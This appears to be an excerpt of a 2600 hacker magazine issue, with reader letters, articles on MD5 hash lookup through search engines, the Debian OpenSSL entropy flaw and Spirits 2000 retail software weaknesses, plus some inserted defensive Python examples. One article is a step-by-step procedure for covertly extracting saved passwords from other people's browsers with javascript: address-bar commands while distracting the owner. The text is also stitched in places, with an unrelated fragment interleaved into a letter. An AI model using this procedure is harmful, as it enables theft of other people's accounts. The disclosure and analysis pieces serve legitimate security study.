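    groups = defaultdict(list)
    for label, password in vault.items():
        groups[residue(label, password)].append(label)
    return {r: sorted(labels) for r, labels in groups.items() if len(labels) > 1}


def rotate(vault, flagged):
    """Copy the vault, giving every flagged account a fresh random password."""
    to_fix = {label for labels in flagged.values() for label in labels}
    return {label: (generate_password() if label in to_fix else pw)
            for label, pw in vault.items()}


# Constructed sample vault. The first two entries follow the buy123/amazon123
# pattern quoted in the letter; the rest are made up for this example.
SAMPLE_VAULT = {
    "buy": "buy123",
    "amazon": "amazon123",
    "forum": "Blue-Harbor-77",
    "webmail": "Blue-Harbor-77",
    "bank": "q7#Vw_2mLx9!eRk4ZtPa",
}

if __name__ == "__main__":
    flagged = audit(SAMPLE_VAULT)
    for shared, labels in flagged.items():
        print(f"shared secret {shared!r} protects: {', '.join(labels)}")
    fixed = rotate(SAMPLE_VAULT, flagged)
    print("after rotation:", audit(fixed) or "no shared residues")
    print(f"a 20-character password carries about {entropy_bits(20):.0f} bits")
```

The rotated vault still has to be stored the way the letters recommend, in an encrypted file or a password manager; the script only shows why the pattern is weak and what a replacement looks like.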
Problems
Dear 2600:
This is a message for people out there that I need
help on undernet server #translate. There is a person
who needs to have a reminder about abusive actions
taken on #translate. They have banned people because
they think that there was a spam going on by
me and they need to remember that if they use mirc
for illegal purposes that they should be charged and
banned from mirc for life.
Their name is @moniq so remember this name
and let this person know about it.
And this is a global message to all 2600 fans out
there so please come in ASAP and thank you for the
help.
Morgan
Have you been outdoors at all this year? There's a
whole world beyond IRC, trust us. And even if there
wasn't, it would be extremely difficult to figure out
how we could possibly care less about any of this.
We hope we were able to help.
Dear 2600:
Not really an article, but unsure of where to send
this to.
Did you guys know Borders in NSW, Australia
are selling 2600 for 18 bucks an issue! I know it's
great that they sell it at all, but makes me glad I've
subscribed through the website.
route
While perhaps your everyday computer nerd will
be able to get into this habit, that won't accomplish
much insofar as getting your parents and grandpar
ents to achieve the same level of protection. First,
the method has to be simple, intuitive, and secure.
Second, and most importantly the people must be
enlightened to the concept of not leaving everything
out in the open. Too many of us willingly give away
It's almost not really a letter too. But it's an interesting
factoid. The Australian dollar at press time is
worth 95 American cents so it's almost exactly even.
Even with all of the various charges that go into overseas
distribution, charging nearly 200 percent over
our cover price doesn't seem justified. Someone's
making a lot off of us. And it ain't us.
Dear 2600:
Hi, I've your Spring 2008 issue in hand. OK on
the change (again) in bindings. I'll keep up whatever
you do. This is by the way, one of those topics where
discussion can never end because both sides are
right.
Yours is one of the largest magazines in print, to
my eye, and that's good. There is however, a topic I'd
like to see getting your special down and gritty treatment.
It is: where is all this crudware on Usenet coming
from? It has now killed the useful discussion that
used to be there; the bright and interesting people
have now gone somewhere else, for good reason,
but the wasteland that's left, full of various crazy and
sub-adolescent verbiage, is a sorry thing to see.
See rec.arts.sf.fandom, for instance; or
comp.os.linux.advocacy. They're broken now.
It concerns me because 1) I think it's meant not
as nuisance but as censorship; and 2) innovation
comes in from the fringes and Usenet used to be a
very good fringe. So I think this is a topic valuable to
all of us, although some out there may disagree with
that. Doesn't someone have at least a very good idea
where that crapware and scatware is coming from?
Actually, I've been slightly puzzled about Usenet
all along. Because when I looked at books on the
topic of the Internet and cyberspace, all sorts of
resources were mentioned but Usenet was not. Yet
looking at it, I thought (used to be) it was the most
alive and interesting part of cyberspace.
Martha Adams
First, when did we become one of the largest
magazines in print? We must have missed something.
As for Usenet, yes, it's sucked for quite a while now.
Moderated newsgroups are really the only possible
means of having interesting discussions and getting
useful information, provided of course that the moderators
don't abuse their power. Uncontrolled newsgroups
invariably lead to chaos and spam. There are
exceptions but you'd be hard pressed to find them
on Usenet.
Dear 2600:
I live in Fredericton, N.B., Canada and the spring
issue just hit the shelves today. I was wondering if it
was ever going to come. I love the quarterly! Now, I
don't know if you already know this or not but when
I started going through the issue I was a bit disappointed
because there are pages that are repeated
(doubles of page 24 and so on) throughout the issue
and articles incomplete or missing because of
this. Just thought that I would say something in case
someone else hasn't yet.
Krista
This is a problem that seems to have affected
some readers in Canada. The printer tells us it didn't
happen to a large number of issues. Our readers are
vital in letting us know when such problems occur
and how widespread they are. If you find yourself
stuck with a defective issue, email subs@2600.com
and we'll take care of it.
Dear 2600:
Someone named Barrett wrote a great piece
about Crapipedia in the latest issue. Great job, and
very accurate. I've run into the same problems trying
to post a listing about a public figure in my area
(northeast U.S.) and each time I tried to post it, some
self-appointed "editor" would take it down, calling
it a personal attack. I'm a lawyer and I know exactly
what is and is not libelous or slanderous. I took special
care not to print anything that wasn't properly
backed up with citations, but it made no difference -
this story was not about to be published regardless of
facts or historical significance of the person.
After appealing to what seemed like a constantly
changing panel of self-appointed experts, I realized
Wikipedia "editors" and administrators don't even
read their own rules and such items are often removed
based on personal preference and political
agenda.
Barrett is too correct - Wikipedia is all about who
the "editors" (teenage Blockbuster video employees
living in mom's basement) agree with, not who's
right.
Sneak Email from a Vendor
Dear 2600:
Today I was appalled to find out that the 3G network
"3" discriminates against 2600.com. When trying
to access the site on my mobile I was informed
by Yahoo (their back end) that the site I wished to
access was unavailable. After contacting customer
care I was informed that sites are "filtered." I presumed
that meant adult content but it looks like
"3" doesn't like 2600. I was told that if I wished to
submit a request to access the site I should email
customer.service.ie@3mail.com. I think you should
too.
Paddy
We'd like to know if others have experienced the
same thing. Thanks for writing.
Dear 2600:
I ordered some nice sweatshirt in order to support
you and to look gorgeous. Everything went fine.
But after trying to give you the best ratings imaginable
I got the following error message: "The URL you
specified could not be found. Please check the URL
you entered and try again." Maybe a known problem,
maybe not. Just wanted to tell you. I assume I
filled out the form correctly.
Regards from Austria
Markus
That does happen on occasion but it most always
is a situation that resolves itself after a few hours. We
suggest trying a few times. If it persists over days,
then it would be worth pursuing.
Dear 2600:
I have purchased your Off The Hook discs and
decided I wanted to listen to them on my Apple iPod
Touch thingy. I used a find . -name "*.mp3" -exec cp
{} /Users/nick/Music/Off-The-Hook \; command and
ended up with a huge number of mp3 files. Unfortunately,
due to some crazy date scheme, they are not
in any sensible order. My plea is thus: please use the
International Date scheme when naming dated files.
This is year, month, and day. This allows computers
to automatically sort files. Now I'll have to write
something dreadful involving awk to assimilate said
files.
The very kindest of regards from a somewhat sunny
and warm southern England
Nick (or should that be N1ck perchance?)
You'll find the later years are in the sensible order.
One of these days we'll get around to fixing the file
naming scheme of the earlier years. We will cheerfully
post any programs that automate the renaming
process on our website.
Dear 2600:
I wrote to the subscription department to see if
my issue had been mailed to me because I hadn't received
it at the beginning of May. Your company was
kind enough to mail me out another issue. I wanted
to thank you for doing that. I also wanted to write to
inform you that the reason I got my post office box
was because my mail would often become "lost."
Now it's happening at my post office box and it involves
the only magazine I would ever subscribe to!
I went and inquired at the post office to see if
my issue that was lost had been found. The lady at
the counter informed me that the postmaster wasn't
there and I would have to speak to her. I told her of
my situation and she went and looked for it. Needless
to say, she didn't find it. She did however inform
me that the people around my box are elderly and
they wouldn't take my magazine without giving it
back. I wanted to let you know that whether it be
by accident or on purpose my issue was lost. Who
knows, an elderly woman may be trying her hand at
eavesdropping with LD_PRELOAD!
I also saw that a lot of people with the name of
Jeff wrote letters in the last issue. I'm glad I put "The"
in front of my name.
The Jeff
Dear 2600:
Over the years I've read many letters in your
magazine about how numerous individuals have
been singled out unfairly by either viewing your
website or by being in possession of the 2600 publication
itself.
I now am one of those proud martyrs. I'm finishing
out the last year and a half of a six year prison
sentence at Delaware Correctional Center. On February
8th my cell was shook down while I was at a
typing class. When I returned to my building a lieutenant
pulled me aside and informed me that I was
being written up for possession of non-dangerous
contraband.
When I asked what this contraband was, he told
me it was two issues each of 2600 and Make Magazine.
Confused, I asked how they could be considered
contraband when the prison mailroom here has
been allowing me to receive these mags for the past
three years and anything the mailroom here considers
a security threat they would not allow the inmate
to have.
The lieutenant, looking equally confused (or
maybe it was just the blank stare of a man waiting
out the workday clock), gave me the "I'm just the
middleman here" speech and told me I'd be moved
to a higher security area to await my hearing. Now
I'm on a near 24/7 lockdown.
My point to all out there reading this is simple.
Don't wallow in self pity if you're ever singled out
by fear peddlers. Use whatever skills you have to
show those ignorant of your passions that you're
driven by a healthy curiosity, not a malicious nature.
Don't waste time arguing with middlemen, go to the
source. If you're barred from doing it in person, don't
underestimate the powerful proxy of presence using
repeated correspondence. Keep up the good work
2600, your pages truly are the few remaining bastions
of originality and free thought left.
Max Rider
SBI 00383681
Unit 21, DCC
1181 Paddock Rd.
Smyrna, DE 19977
Good Things
Dear 2600:
I just found 2600 while browsing at Barnes &
Noble. What a great surprise and treat. I am sending
for a subscription today! I was one of the "old
time" hackers who did nothing at night but crack
C64 games and programs. I've been out of it since
the end of the 80s and haven't spoken to any of my
old "fellow hackers" since then. I am amazed at the
content of your magazine and wish a thousand more
years of success!
ExPhillyMM
Dear 2600:
Regarding the return of the stapled spine... Thank
you! Thank you! Thank you!
Apathy
Dear 2600:
I just received 25:1 and it was only by the time
that I got to page 45 under "Observations" after reading
Check Check's comments about the binding that
I realized you guys are back to using the classic two
staples instead of the glue binding. It was a moment
of Zen as I realized that this is why it felt so comfortable
in my hand and why it opened so nicely making
it easier to read and enjoy. Thanks for the change, it
really means a lot!
Israel Torres
Dear 2600:
I just finished reading an article in the latest 2600
magazine, and I was flipping back to the contents
when I realized that this issue was staple-bound. I
like to fold the magazine all the way back so that
I can hold it in one hand while reading. I love the
staple-binding so much more than the glue-binding
we had in 2007! Thanks for switching back.
Lex
We really had no choice after a year of one prob
lem after another. It would have been nice if the oth
er binding had worked out but for whatever reason it
didn't, so staples it is.
I mmortal ize yourself with a good old-fashioned
letter to 2600. Simply email letters@2600.com
or send snail mail to
2600 Letters, PO Box 99,
Middle Island, NY 1 1 953.
I t may be the best decision you make this year.
Cracking with the Webtionary: Using Google and Yahoo! to Light-Force an (Almost) Infinite Dictionary
by Acrobatic
Attacks on cryptographic schemes have been around for years. Generally, the most successful attacks rely on time, powerful processors, and a large pool of data from which to test cracking attempts.
One way of alleviating the time problem and thus the processor problem is to have more than one cracker working on the problem simultaneously. We see the effects of this in contests like distributed.net's Project RC5, which used distributed computing to crack previously uncrackable ciphers, having hundreds of thousands of people employ their computers towards the goal of testing every possible key until the correct one is found.
Many attacks on encrypted passwords rely on dictionary attacks, in which weak passwords are guessed by testing them against millions of entries of plaintext words in a file or database. Often, these repositories can be found split into themes, such as huge lists of personal names, places, or commonly used passwords. The larger your pool of data, the better your chances of success - but the longer it will take to test every possibility.
It was recently pointed out that cryptographic hashes such as MD5 can be reversed using search engines such as Google. For example, searching for the MD5 hash of "5f4dcc3b5aa765d61d8327deb882cf99" takes less than a quarter of a second to return over 500 pages with both 5f4dcc3b5aa765d61d8327deb882cf99 and the word "password" in them, in close proximity to each other. (It is no coincidence that "password" is one of the top 10 most frequently used passwords.)
Remember our three criteria for increasing success at cracking? We've just used one computer, a search engine, and less than a quarter of a second to crack an "uncrackable" hash. By using search engines, we use Google and Yahoo!'s immense catalogs of indexed pages and their thousands of server processors to search for a hash on the same page as its plaintext equivalent.
Imagine the possibilities: millions of pages with millions of hashes and their respective plaintexts, indexed by Google and Yahoo! for us to peruse. The internet has essentially become both a distributed computing ring and a huge dictionary for us to brute-force from - a webtionary.
Granted, this isn't nearly as easy for more secure passwords or for passwords that have been salted and then hashed. (Salting is adding text to a password before encrypting it, then using that same text to aid in the decryption.) However, a vast majority of people use passwords that are very easy to decipher if you know the hash. Getting the hash is a different problem in itself, and I'll get to that in a second.
Using PHP I wrote a program that takes care of the dirty work for you. It does a Google search for a hash, scans the results, sorts them by word frequency, and uses that relatively small subset as a cracking dictionary to find a match. If it finds a match, it returns the plaintext to you, so you don't have to search all the pages manually. If the Google search is unsuccessful, the program does a search with Yahoo!; it scans the URL title, the Yahoo! summary of the page, and finally, if that fails, the page itself, and performs similar analysis as we did with the Google results.
I originally thought about creating a huge database full of deciphered hashes as a backup when the webtionary search failed, but the point of the project is not to become a cracking database, but rather to show the power of using the web and search engines to do all the hard work. Besides, you can find scores of these databases across the web; for example, GDataOnline.com alone has almost 900,000 solved hashes.
As you'll see in the source code, I did build in the ability to use a database, but this is only for storing passwords which have already been deciphered using the script. This is because the search engine APIs I use only allow a limited amount of lookups per day. I'll leave the database write method turned off until the search engines start blocking access because I've used up my limit.
Using this script, I've been able to find the matches for hundreds of hashes in less than a few seconds each. It's important to remember that this is not a cracker - it's a finder. Instead of brute-force, I like to call it "light-force." If the hash and plaintext haven't been posted to the web and indexed by the search engines, this script won't help.
Just for fun, I used the script to search for this hash: 32b991e5d77ad140559ffb95522992d0
Yahoo! found and returned the plaintext "2600" to me in 1.074 seconds. This means that somewhere out there, someone has used and deciphered "2600" as a password and posted it on the internet.
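The finder-versus-cracker distinction and the salting advice in this article, as an added example (not the author's PHP script): a Python audit in which a constructed word list stands in for hash/plaintext pairs already indexed on the web. The names PUBLISHED_WORDS, audit, the record formats and the work factor are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets

# Constructed sample: stands in for hash/plaintext pairs already posted on
# indexed web pages. A real index holds millions of such pairs.
PUBLISHED_WORDS = ["password", "letmein", "2600", "qwerty", "dragon"]
PBKDF2_ROUNDS = 200_000  # assumed work factor for the illustration


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def build_index(words):
    """Digest -> plaintext map: what a search index effectively provides."""
    return {md5_hex(w.encode()): w for w in words}


def find_plaintext(index, digest):
    """A 'finder', not a cracker: one lookup, no guessing."""
    return index.get(digest.lower())


def store_unsalted_md5(password):
    return "md5$" + md5_hex(password.encode())


def store_salted_md5(password, salt=None):
    # A per-user salt makes the digest unique, so a shared index misses it.
    # MD5 is still fast, so offline guessing against one record stays cheap.
    salt = salt or secrets.token_bytes(16)
    return "smd5$" + salt.hex() + "$" + md5_hex(salt + password.encode())


def store_pbkdf2(password, salt=None):
    # Salted and deliberately slow: each guess costs PBKDF2_ROUNDS hashes.
    salt = salt or secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password, record):
    """Recompute with the stored salt and compare in constant time."""
    scheme, rounds, salt_hex, dk_hex = record.split("$")
    if scheme != "pbkdf2":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def audit(user_records, index):
    """Return {user: plaintext} for records recoverable by lookup alone."""
    exposed = {}
    for user, record in user_records.items():
        digest = record.split("$")[-1]
        found = find_plaintext(index, digest)
        if found is not None:
            exposed[user] = found
    return exposed


def sample_user_table():
    # Constructed accounts; all three users chose the same weak password.
    return {
        "alice": store_unsalted_md5("password"),
        "bob": store_salted_md5("password"),
        "carol": store_pbkdf2("password"),
    }


if __name__ == "__main__":
    index = build_index(PUBLISHED_WORDS)
    table = sample_user_table()
    for user, record in table.items():
        print(user, record[:60])
    print("recoverable by lookup:", audit(table, index))
```

Only the unsalted record is found by lookup; the salted MD5 record escapes the shared index but remains cheap to guess against offline, which is why the slow, salted form is the one to store.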
While writing this program, I investigated and inspected many pages of results from search engines. I was shocked by the number of pages I found that were database dumps of user information, including contact information, security questions and answers, private message logs, and more, tucked away along with the MD5 hashes of their passwords in various websites across the world, where their owners probably thought they were safe. A more nefarious programmer could write a script to search each of these hashes and easily compromise websites and user accounts.
This should once again be a reminder to programmers to always secure your data. At least salt your users' passwords before storing them on the web. And it's always a good idea to test the strength of your own password. You can create an MD5 hash of a plaintext word in Linux or OS X by typing md5 -s plaintext, or find one of the many MD5 generators on the web. Then, see if the program can decipher your hash.
My working model can be found at http://www.bigtrapeze.com/md5/. The source code can be found at http://www.bigtrapeze.com/md5/source/ or in the 2600 code repository.
The scripts mentioned in this article can be downloaded from the 2600 Code Repository at http://www.2600.com/code/
JavaScript Password DOMination
by Jacob P. Silvia
jacob.silvia@gmail.com
Introduction
Have you ever been on a public computer, gone to a site requiring a login, and realized that the person using the computer before you stored his or her password on that computer? You can then log in to the account, play with the settings, or change the user name to Ima Tool or the default language to Esperanto, but many sites won't let you change the password to one of your own choosing unless you know what the previous password was. Thus, no matter what changes you may make, Ima will still be able to log in again, change the name and language back, and maybe even change the password.
Before I continue, I should mention that you should never really log into someone else's account and change settings, nor should you compromise anyone's password. This article is meant both to inform, by explaining how to retrieve passwords easily, and to caution, warning against passwords without taking the necessary precautions to secure them.
This is not the most technical article on password recovery. In fact, it's so easy that a script kiddie could do it. I know that there exist tools, and maybe even browser extensions, that will retrieve stored passwords for you in moments, but for the sake of argument we're pretending that we're on a computer that we can't easily or quickly install software onto and that we only have access to the web browser. We also want to make it look to the casual eavesdropper that we're actually just surfing the web, minding our own business. We don't want to, and indeed might not be allowed to, do something like running regedit when we're, for example, at a library, or when at the house of a friend who's in the other room, microwaving a Hot Pocket or something.
Supplies
You'll need a few things. The first is access to a browser with stored passwords, preferably IE 6+ or Firefox 2+, as I haven't tested this method on other browsers. You'll also need a bit of knowledge of HTML DOM and JavaScript, the ability to increment and decrement integers by 1 in your head (i.e., to count), and the ability to remember two numbers. It's a plus if you can type quickly and if you can distract your mark for long enough to carry out the password retrieval. It's also handy to carry a pen and a notebook in order to jot down your findings.
JavaScript and the HTML DOM
Now, a slight aside to discuss JavaScript and the HTML DOM (Document Object Model): if you weren't aware, most browsers allow you to execute JavaScript from the address bar. (See "Javascript Injection," 2600 Autumn 2005.) It's a simple matter of typing javascript:command(), for some command, into the browser's address bar. For example, javascript:alert() will pop up a blank dialog box.
The HTML DOM is one of the best things to happen to people who like doing powerful things with otherwise uninteresting web pages. Using JavaScript, you can change practically any parameter on any tag, and you can even make new tags. You may, if you're so inclined, use JavaScript to modify the DOM and so alter the page you're viewing to suit your preferences, though this exercise is left to the reader. Check out http://www.w3schools.com/htmldom/default.asp for an introduction to the HTML DOM.
There are three parts of the DOM that you need to concern yourself with: document, the DOM's parent object; forms, the array that holds the document's forms; and elements, the array that holds the elements of the form. Simple, eh? Okay, so now that nobody's watching, it's time to work our magic.
Procedure
Step 1. Open the browser. If your mark is still on your shoulder, just surf to some inconspicuous site until you can get him or her to go away. Gone yet? Good.
Step 2. Surf to the site with the stored password. If there isn't a login screen on the main page, go to the login screen. See those dots, asterisks, or whatevers? That's what we're going to uncover.
Step 3. Type javascript:alert(document.forms.length) into the address bar and press enter. Remember the number that pops up. Let's call it x. If this step doesn't work, ensure that you typed everything correctly. If it still isn't working, you may have to resort to more guerrilla tactics to get your passwords. Sorry!
Step 4. For each number from 0 to x-1, try javascript:alert(document.forms[x].name) and look for something promising, such as "login" or a similar name. If x is 1, then congratulations: you don't need to worry about this step!
Step 5. Once you have the right value of x, do javascript:alert(document.forms[x].elements.length). Remember this number; let's call it y.
Step 6. Now, for each number from 0 to y-1, try javascript:alert(document.forms[x].elements[y].name) until you get "password," "pin," or something similar.
Step 7. Let your heart go tha-thump; you're about to see a password that you're not supposed to see!
Step 8. Type javascript:alert(document.forms[x].elements[y].value). Quickly memorize or write down the password. Taking note of the user ID will be a great help, too. Then, quickly surf back to your inconspicuous site before your friend comes back with that Hot Pocket or that batty old librarian wonders what you're doing.
Whew! If you successfully kept your cool during this trial, go ahead and give yourself a pat on the back, and keep an eye on the papers for auditions to be in the next Mission: Impossible movie.
Comments
Stealing is wrong, at least for some senses of the words stealing, is, and wrong. Don't abuse the knowledge presented in this article, because I'm not responsible if you somehow break a law or company policy by doing this.
As I mentioned earlier, this has only been tested on IE and Firefox. These are the only two browsers that many people think about; however, there are many other browsers out there - you know what they are, or Google does if you don't. Feel free to try this on other browsers. If it works, huzzah; if not, boo-hoo. Be aware that you may leave a trail of your actions, especially if your friend or library has some sort of keystroke tracking.
Feel free to come up with a more efficient or sneakier way to do this. I'd love to hear about it, and I'm sure that the rest of the readers would too. Or, if you would rather protect your "flock" from the "wolves" who will surely use this technique or some other method to compromise accounts, you may turn off the browser's password storage prompt and save everyone a little bit of a headache.
Thanks for reading!
Spirits 2000 Insecurity
by drlecter
Disclaimer: This article is for informational purposes only. If you get caught, it's not my problem. You shouldn't have been so stupid.
Until recently, I worked at a rather nice liquor store. We used a software suite called Spirits 2000, which has been widely used in retail liquor stores since the 1980s. It was created by Atlantic Systems Incorporated (ASI). I read in a beverage magazine that the Spirits 2000 package starts at $10,000. This software keeps track of everything, including inventory, sales, employee information, shipments, and much more. It is a pretty robust system.
The brains of the software suite is called Spirits Backroom. Backroom controls everything from prices to employee information to inventory adjustments - the whole nine yards. The place I worked at had several computers running this software, and any change made on one computer would automatically update the data on the others through a process called polling. So, if I sold a bottle of Jack from one of the registers, the data files on all of the other computers would be updated with the sale information; that is, the sale price, discount given, time and date, and so on. There are several different security levels you can assign users. The basic level allows users to look up the cost of an item and print price tags. That's about it. The next level allows you to change prices and product names, discontinue products, and add or delete items. Other levels include the ability to give discounts, do price matching, and return items. The boss has the highest level of permissions of course. He has access to all of the employee data including name, address, date of birth, alarm codes, social security number, and rate of pay.
Here is the problem, though. Through Backroom, you have to have the management password to access employee information, but I found that if you navigate through the file system to C:\KSV\Data, there are a bunch of data files. One of the more interesting ones is emp.cdx. If you open this file in notepad, it is barely readable; it's not even a comma delimited file. If, instead, you open it in a program such as Microsoft Visual FoxPro, it opens as a nice neat database, displaying all of the employee info for all employees, past and present: everything that management has access to, but without a password. It is also possible to access the journal files that contain information on all of the sales, the inventory files, and just about everything that upper management doesn't want you to have access to. To make matters worse, the company that set the system up, ASI, set every computer to share the entire C:\ drive with read and write access! I am sure you can imagine some scary possibilities.
Another problem with this ridiculous setup is that the last credit or debit card run on each register is stored either in C:\KSV\credit_cards.txt or C:\KSV\debit_cards.txt. All of the credit card data is stored here: the full number, the expiration date, and the customer's name. So, with a couple of passes over the registers, you can get quite a few different credit card numbers. There are quite a few more things that you can access or change in the data directory, and much fun can be had with .ini files, but that is beyond the scope of this article.
I mentioned a couple of these problems to the tech they sent out one time, and all he said was, "We aren't talking national security here." That was very disturbing, to say the least. So I thought that maybe an article in a widely-read hacker magazine might get their attention. Oh, I almost forgot: they set the router to be remotely accessible, with a 4 character password, all lowercase letters, that I guessed in about 3 minutes. In fact, it is the string of characters I use for email subjects when I am too lazy to think of something. Getting the IP address was easy too; I would just send my boss an email about something, and then check the headers in his reply. In closing, I would like to say that I hope this article does some good, and maybe helps to protect the privacy of liquor store employees and customers all over the country.
Hello to Mom, Dad, and Sam.
"How to Neuter Cryptography for Thousands of Users in Two Lines"
Two years ago a vendor made a nonstandard modification to a cryptography library used by thousands of systems for SSH, VPN, SSL, and most other encrypted traffic. For two years this change went undetected, introducing weaknesses into the key generation and encrypted traffic.
Sound like a large commercial vendor (synonym: small, limp) colluding with a spy-happy government to weaken cryptography to ease surveillance? A foreign governmental agency hoping to accomplish the same? Would you believe an open source developer on arguably one of the most militantly GPL and open Linux distributions, on a completely open source project?
In September of 2006, a Debian developer followed a warning from the memory auditing tools purify and valgrind, and identified a potential read of uninitialized memory in OpenSSL, and commented out the offending line. Unfortunately this line added the supplied data to the entropy pool, effectively removing the randomness at the heart of the cryptographic engine. This change was then picked up by Ubuntu, and presumably any other Debian-based distribution.
The entropy pool is used to create pseudo-random (since very little in a computer is actually random) data used to create cryptographic keys. Typically entropy comes from a combination of sources, such as network packet rate, disk IO characteristics, typing rates, mouse movement, and on systems which provide it, a random number generator in hardware. The kernel keeps track of these sources, and adds the entropy to the system-wide random pool, but during initialization, OpenSSL must add the entropy to its own sources.
Instead of seeding the random number stream from the process ID and the system wide entropy pool, the crippled OpenSSL PRNG (pseudo-random number generator) uses only the process ID, on Linux falling between 1 and 32,767, meaning instead of 2^128 (the minimum amount of entropy OpenSSL expects) possibilities - northwards of an undecillion (and yes I had to look on wikipedia for that) possibilities, there are instead 2^15 possibilities. Put another way, instead of needing 3.7 x 10^32 gigabytes to store every possible SSH host key, it now takes about 40 megabytes per hardware platform (Intel 32bit, Intel 64bit, PowerPC, etc.). Put a third way, that's 1.9 x 10^-32 percent as many keys as there should have been. (And if you remember your high school math that's 0.0, thirty-one zeroes, 19. It's actually hard to represent these numbers in this article - they're so small!)
Not only has the total number of possible keys been drastically reduced, but a key is now much more predictable depending on when it was generated, as noted by H.D. Moore. Many services generate their keys during install, meaning the process ID of the installer is likely to fall within a predictable range.
The significantly reduced total key space makes brute force attacks against user logins and impersonation of servers trivial. Performing a man-in-the-middle attack (over, for example, a wireless network) becomes as simple as fingerprinting the public key of the host and providing the private key from the table of pre-calculated keys. No alert is raised that the host key has changed, and the client continues as normal.
Administrators of systems where a user has uploaded an SSH user key are also vulnerable, even when the system itself does not use a vulnerable OpenSSL library. Since SSH user keys cover a similarly small key space, brute forcing a user is only a matter of time. Most SSH servers allow seven attempts per connection, meaning the average search area for matching the user's key is just over 2000 connections (32,768 divided by two since on average a key will be found in half of the search area, divided by seven attempts per connection). If the attacker has access to the user's public key (via a web page, control of another server where the user has uploaded a key, etc.), then matching it becomes a matter of simply matching the precomputed keys. Since the process ID of the SSH-keygen process is moderately guessable, the search area can be narrowed even further, making brute forcing users with vulnerable keys even easier.
H.D. Moore has precomputed the SSH host and user keys for several platforms, available at http://metasploit.com/users/hdm/tools/debian-openssl/
This flaw affects every application which uses OpenSSL, and is especially insidious because it introduces a persistent, permanent vulnerability which does not go away simply by upgrading the affected library. Any application which stores a key generated by the vulnerable library will continue to be vulnerable: OpenSSH, OpenVPN, Apache, Imap-SSL, Bind, SSH clients, some hard drive encryption schemes such as encfs, and any other SSL based application, must regenerate the keys and notify users that the keys and certificates have changed. All SSH RSA user keys generated on a weakened system must be replaced on every system they have been copied to. All SSH DSA user keys used on a weakened system must be replaced - even if they were generated prior to the weakness - due to a flaw in the DSA mechanism that reveals the private key if an attacker captures multiple uses of the same cryptographic nonce, which is generated by the same flawed PRNG.
Additionally, any encrypted traffic exchanged from or to a weakened system is now vulnerable to attack - even if the keys used predate the vulnerability - including any traffic performed over the past two years which might have been logged by anyone between you and the affected system. Again, this includes SSH and any service using SSL, such as HTTPS, the very traffic containing sensitive information you encrypted to protect in the first place. The random seed is used in the PRNG to generate per-session symmetric encryption keys, which are faster and require less resources to encrypt data than the public key method used to identify a server. How easy could it be to crack saved SSL sessions? In 1996, Netscape used a weak PRNG seed (a hash of the time, process ID, and parent process ID) which could generate, at best, a seed of 47 bits (2^47 possibilities). Ian Goldberg and David Wagner, students at Berkeley, wrote a brute-force attack which could break an SSL session in 25 seconds. Using 1996 level hardware, they were able to break the SSL sessions, without knowing the keys, of a seed with four billion times more entropy than the weakened OpenSSL seed. SSH will likely show similar times, especially when the keys themselves are guessable.
How does something like this happen? Most likely, a combination of good intentions, ignorance, and lack of vigilance. Typically, reading from uninitialized memory is a bad thing - it will have unpredictable results since the value is unknown. When seeding a pool of random data, reading from uninitialized memory is at worst useless - the memory contains all zeroes - and at best another source of semi random data to be combined into the pool. Instead of fixing the initial seed of uninitialized memory, the developer commented out the line which used the uninitialized memory where the function adds the input to the entropy pool. By falling into a rote fixing pattern where the goal was to eliminate warnings from Purify, rather than to understand the code and how it was used, a simple mistake became an enormous flaw. Lack of community vigilance in spotting this change during testing allowed it into the main codebase.
Something of this magnitude will likely happen again, though hopefully not for some time, due to the publicity this exposure has gotten. The only solution is to be vigilant about what is modified and installed. Monitor critical packages for modifications, contribute to auditing on your favorite distribution, and don't mess with random number generators.
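The keyspace collapse described in this article, as an added example (not OpenSSL or Debian code): a toy generator whose pool receives either the process ID alone or the process ID plus other entropy, with SHA-256 standing in for the real key derivation. The function names and the constructed key inventory are assumptions; the audit models the defensive step of checking deployed keys against every key the weakened generator could have produced before replacing them.

```python
import hashlib
import secrets

PID_MAX = 32767  # highest process ID in the article's description of Linux


def toy_keygen(pid, other_entropy=b""):
    """Toy model, NOT OpenSSL's algorithm: the 'key' is a hash of the pool.

    other_entropy models the input that the commented-out line used to mix
    in. With it empty, the process ID is the only thing that varies.
    """
    pool = hashlib.sha256()
    pool.update(b"toy-pool-v1")
    pool.update(pid.to_bytes(2, "big"))
    pool.update(other_entropy)
    return pool.digest()


def fingerprint(key):
    """Short public identifier for a key, as an SSH fingerprint would be."""
    return hashlib.sha256(key).hexdigest()[:32]


def build_blocklist():
    """Every fingerprint the PID-only generator can ever emit."""
    return {fingerprint(toy_keygen(pid)): pid for pid in range(1, PID_MAX + 1)}


def audit_keys(deployed, blocklist):
    """Return {owner: pid} for deployed keys that appear in the blocklist."""
    return {owner: blocklist[fp]
            for owner, fp in sorted(deployed.items())
            if fp in blocklist}


def average_connections(keyspace, attempts_per_connection):
    """The article's estimate: half the keyspace, several tries per connection."""
    return keyspace / 2 / attempts_per_connection


def sample_deployed_keys():
    # Constructed inventory: two keys made by the weakened generator and one
    # made with 32 bytes of additional entropy mixed into the pool.
    return {
        "build-host": fingerprint(toy_keygen(4242)),
        "mail-server": fingerprint(toy_keygen(311)),
        "laptop": fingerprint(toy_keygen(4242, secrets.token_bytes(32))),
    }


if __name__ == "__main__":
    blocklist = build_blocklist()
    print("distinct weak keys:", len(blocklist))
    print("keys to replace:", audit_keys(sample_deployed_keys(), blocklist))
    print("average connections:", round(average_connections(32768, 7)))
```

The laptop key was generated under the same process ID as the build host's, yet it is absent from the blocklist because the extra pool input was present; upgrading the library would not change the other two fingerprints, which is why the article insists on regenerating keys.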
THE GEEK SQUAD
by Turgon
Ahh, the Geek Squad: love them or hate them, they're here to stay. Best Buy's computer "task force" can be found in every store, at your home or office, or on the road in their black and white VW beetles.
A majority of their employees, who are known as Agents, are high school kids with a basic understanding of Windows Vista and XP, but more than a few of them really know their stuff. Some even read and contribute to 2600 Magazine.
